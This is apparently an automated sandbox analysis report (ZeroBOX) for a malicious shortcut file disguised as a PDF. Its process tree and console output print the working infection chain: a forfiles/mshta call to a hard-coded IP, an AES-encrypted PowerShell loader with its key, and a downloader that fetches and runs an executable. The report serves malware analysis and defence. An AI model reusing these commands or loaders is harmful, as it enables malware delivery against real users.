Summary | ZeroBOX

SetupPacket.pdf.lnk

Generic Malware Malicious Library Admin Tool (Sysinternals etc ...) Antivirus UPX PDF Anti_VM GIF Format AntiDebug Lnk Format ZIP Format MZP Format PE32 PE File AntiVM BMP Format PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us July 31, 2024, 9:44 a.m. July 31, 2024, 9:46 a.m.
Size 1.9KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri May 7 23:13:59 2021, mtime=Fri May 7 23:13:59 2021, atime=Fri May 7 23:13:59 2021, length=41472, window=hidenormalshowminimized
MD5 76c809c3d668c4b5d280c7ca0d7920ae
SHA256 2ef83de52e2d028ebc1f5e03e563a02da61d04e877681a85d998c4fc3a829d3f
CRC32 A333EC5B
ssdeep 24:8WYaNpm00mhv234pyAdkr+/4IKc+0F6xDop7bLqdd79dssCc/Hf9Cm:8WYaXmwpYuvpZ7pPedJ9O
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "WkKUiuYYAeRIH" C:\Users\test22\AppData\Local\Temp\SetupPacket.pdf.lnk

    1572
    • forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://212.18.104.197/SetupPacket"

      2148
        • mshta.exe "C:\Windows\system32\mshta.exe" http://212.18.104.197/SetupPacket

          2348
          • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function pgfjld($PGNrUcfE){return -split ($PGNrUcfE -replace '..', '0x$& ')};$KSZkdseY = pgfjld('BD984A0FC850BB44442AB135AD00799F795CFD9782453AD5D65AD8AC7511FF49D6DDDBC7D2B967E73CCFE2DBD48BC75AA261C7ACCD18C46967A73C81595FA81ABAC490F2F226E0251A513A4B21E66B2A6371DE32E243D9E1FCEEA18171DB485AA84154335973B76C09FFB7E823CAA4C1375575D0FEDEF352B4FCBC5473F6870A50F66D68AF3202EFB9BF7005FDB10135E712D570B5D6D0B7AAC5D11854E38181A9C470D177AC65A6954DE07D80DA0F6E83115F07461A9518778A968F10C5C931BD3594178DF5302D23589E14199DFA5181080383BD4D628FE9BE599155260F684C139F1D4F408F22CFF8AED6806BA3DA58371A40D3D2732A024CE5A6C931D63E55FDBD23AB9A57EA14D19EF63873994C5E444B43BC89DAC972500EA7BD2ECB3D2F81AF0D0EA29833CACEBDAE6B6B1D4E25B48D58588328BF188F29DBCB379A72E161066FD34621F72D68D5530F37C85A61B6AC673FDE6A01FF74B52C6998219D26D6DBBFC26293BBE6FDEF85F4A09824742858EEA1EB9CEECB8D81986F4166A8874DFD622FFD402AC6882AC4AD710A378C7168D6B2EA044323611D399C994ACF4603926DAF52C623CB16CAC1D7C16DB58B5FA1D31F7D8C2FB4480382E1FC23B5F9B5B66D573F90A9B258485299C2596FE82B36E3C7326CB52F66C6EAFC6D3EC454540970BE8C1CF87D605B2DBAFAF2D510A905A0BFB808FE75945350C83DB1818772DCF19D80538295F61D8E9D3533EA678C3F7D6E2DC324C9D730DB9E656868BB9B709552880B18262A46F7E94DB280B7FA058FDC076E752E7FF6661D9F09B9E53F175F2FD3C10B5D9188041FA5D6528660679C9FE79581222A6085EBE13A485BE1DE0A931A5E033DD0454B961EC6335C85040D6E4E2A52AAEF3E2CC86B0BEB51BF9FC90CE3CFD976A9B98CE872A8DA2CE6109CF1E5820DE57F4E8330C4E72455878508B3E5E66106BA62319AD62B4EEDCC3C0941E4E079D47796433B3A50DD0E37FA3D3C5098CD81EA9C9B88444E80EC5CBD3D013B194B9469DB44A4FCBDE1D3725078344CE1B3E662664F431F0995AB5FAC20FD2F3D4ECA9B9BC698488920884EC721EAD479726F1B066D93FD0964DA08B00D266DC7CFC23B886022E11553E9490BFE661AC4C595009695D3B528350460481543CB98715E4F835875914FE5AEBBA37F97D416B229EAFFD9632D85743AD504FF5F0A62BDDDA073A7B73FB9892606DA003F4FB0DA04B07FF8EFC54F1BE308CA1016E6FAA3309E00A5675411B212225C318DE27FE256671B0160FEF7400D7D8061919DC03ACEEEF58A642865B0787AEC57D4BD08971385313CF742DC639EC6B73F5C3E8CEC7C58E5E46D2CA19E8ED839E44D0D1C7EC63831699E034E4E168D4169B54E1401021A157055EED8152216E819ABF15CBAD706EA9EF845663DE3DD8780F0B7D5B9412ACFF1703134B29701021750F36342107190ECF305A42153FBB1112EC001A667060D19CF78C11E6556C1CCD1A7F928A485E07756716E4BB48772F16395960ACBA41B4CCFFD751EAC7058B9641FE34CA280A852F2C890536A55164615E7C78EACEAC039DAD58C2645D6FC6AFA9B1F0FDE4DA75160A4D11F2F69A7F7E36C2333DA9716CACAB0FB448B429689CB636FC54F37862D743C6A176E6C08956C6890E2E653A5A365E628F05310712F2E4D68F30EEE1B76FFAFC8B0148B386D496033F1D4B0A2F07C9D1CA3F587A3FD29AA491F720996C7FE6E230D2567EA102E9F66BFC765A3B009E1E001FCA56127D35681725C431A1726CEBFADE1FB20D62605846A83429E8A692E0C1C96BC9041876FBBF1B53A05A6BCFD234D7A5438A6072F4D472C5D17C5E0E853A023DA66B8B263B9794BDF8D8A61D609F9C1480BC7F7B2A0D3E097B26F3F476AAAB419D29CE99A04E9204EBAE2ED0F6F74');$dXtUn = [System.Security.Cryptography.Aes]::Create();$dXtUn.Key = pgfjld('74474F76576A4554674472586F625872');$dXtUn.IV = New-Object byte[] 16;$qwmdrLPB = $dXtUn.CreateDecryptor();$kWgRZUeAP = $qwmdrLPB.TransformFinalBlock($KSZkdseY, 0, $KSZkdseY.Length);$FsJGITdVz = [System.Text.Encoding]::Utf8.GetString($kWgRZUeAP);$qwmdrLPB.Dispose();& $FsJGITdVz.Substring(0,3) $FsJGITdVz.Substring(3)

            2496

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
212.18.104.197 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x0000001f
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002b
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x00000037
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000043
1 1 0

WriteConsoleW

buffer: At line:1 char:234
console_handle: 0x0000004f
1 1 0

WriteConsoleW

buffer: + function ywV($LZu, $YAC){[IO.File]::WriteAllBytes($LZu, $YAC)};function nZa($
console_handle: 0x0000005b
1 1 0

WriteConsoleW

buffer: LZu){start $LZu };function cYU($UpD){$rhG = New-Object (STw @(3249,3272,3287,32
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: 17,3258,3272,3269,3238,3279,3276,3272,3281,3287));[Net.ServicePointManager]:: <
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: <<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$YAC = $rhG.DownloadDa
console_handle: 0x0000007f
1 1 0

WriteConsoleW

buffer: ta($UpD);return $YAC};function STw($isO){$ZXH=3171;$iCg=$Null;foreach($WBS in $
console_handle: 0x0000008b
1 1 0

WriteConsoleW

buffer: isO){$iCg+=[char]($WBS-$ZXH)};return $iCg};function ZUR(){$FbR = $env:AppData +
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: '\';$dmetXZr= $env:AppData;$kNTVUK = $dmetXZr + '\TopNotchSetupPacket.pdf';If(
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: Test-Path -Path $kNTVUK){Invoke-Item $kNTVUK;}Else{ $PCuDKr = cYU (STw @(3275,3
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: ,3288,3283,3251,3268,3270,3278,3272,3287,3217,3283,3271,3273));ywV $kNTVUK $PCu
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: DKr;Invoke-Item $kNTVUK;};;;$qnSLadm = $FbR + 'AdeptTranslatorPro_[3MB]_[1sig].
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: exe'; if (Test-Path -Path $qnSLadm){nZa $qnSLadm;}Else{$DHhusDaHVq = cYU (STw @
console_handle: 0x000000eb
1 1 0

WriteConsoleW

buffer: 262,3220,3286,3276,3274,3264,3217,3272,3291,3272));ywV $qnSLadm $DHhusDaHVq;nZa
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: $qnSLadm};;;}ZUR;
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:234
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function ywV($LZu, $YAC){[IO.File]::WriteAllBytes($LZu, $YAC)};function nZa($
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: LZu){start $LZu };function cYU($UpD){$rhG = New-Object (STw @(3249,3272,3287,32
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 17,3258,3272,3269,3238,3279,3276,3272,3281,3287));[Net.ServicePointManager]:: <
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: <<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$YAC = $rhG.DownloadDa
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ta($UpD);return $YAC};function STw($isO){$ZXH=3171;$iCg=$Null;foreach($WBS in $
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: isO){$iCg+=[char]($WBS-$ZXH)};return $iCg};function ZUR(){$FbR = $env:AppData +
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: '\';$dmetXZr= $env:AppData;$kNTVUK = $dmetXZr + '\TopNotchSetupPacket.pdf';If(
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: Test-Path -Path $kNTVUK){Invoke-Item $kNTVUK;}Else{ $PCuDKr = cYU (STw @(3275,3
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ,3288,3283,3251,3268,3270,3278,3272,3287,3217,3283,3271,3273));ywV $kNTVUK $PCu
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: DKr;Invoke-Item $kNTVUK;};;;$qnSLadm = $FbR + 'AdeptTranslatorPro_[3MB]_[1sig].
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: exe'; if (Test-Path -Path $qnSLadm){nZa $qnSLadm;}Else{$DHhusDaHVq = cYU (STw @
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: 262,3220,3286,3276,3274,3264,3217,3272,3291,3272));ywV $qnSLadm $DHhusDaHVq;nZa
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: $qnSLadm};;;}ZUR;
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000143
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006498a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006499e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006499e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006499e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006491e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006491e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006491e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006491e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006491e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006491e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006499e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006499e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006499e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649d20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00649da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dc378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dc4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dc4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dc4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dbcb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dbcb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dbcb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dbcb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dbcb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003dbcb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file c:\program files\mozilla firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://212.18.104.197/SetupPacket
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://212.18.104.197/TopNotchSetupPacket.pdf
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://212.18.104.197/AdeptTranslatorPro_%5B3MB%5D_%5B1sig%5D.exe
request GET http://212.18.104.197/SetupPacket
request GET http://212.18.104.197/TopNotchSetupPacket.pdf
request GET http://212.18.104.197/AdeptTranslatorPro_%5B3MB%5D_%5B1sig%5D.exe
request GET http://acroipm2.adobe.com/20/rdr/ENU/win/nooem/none/consumer/278_20_6_20042.zip
request GET http://acroipm2.adobe.com/20/rdr/ENU/win/nooem/none/consumer/281_20_6_20042.zip
request GET http://acroipm2.adobe.com/20/rdr/ENU/win/nooem/none/consumer/280_20_6_20042.zip
request GET http://acroipm2.adobe.com/20/rdr/ENU/win/nooem/none/consumer/277_20_6_20042.zip
request GET http://acroipm2.adobe.com/20/rdr/ENU/win/nooem/none/consumer/message.zip
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 1179648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02527000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
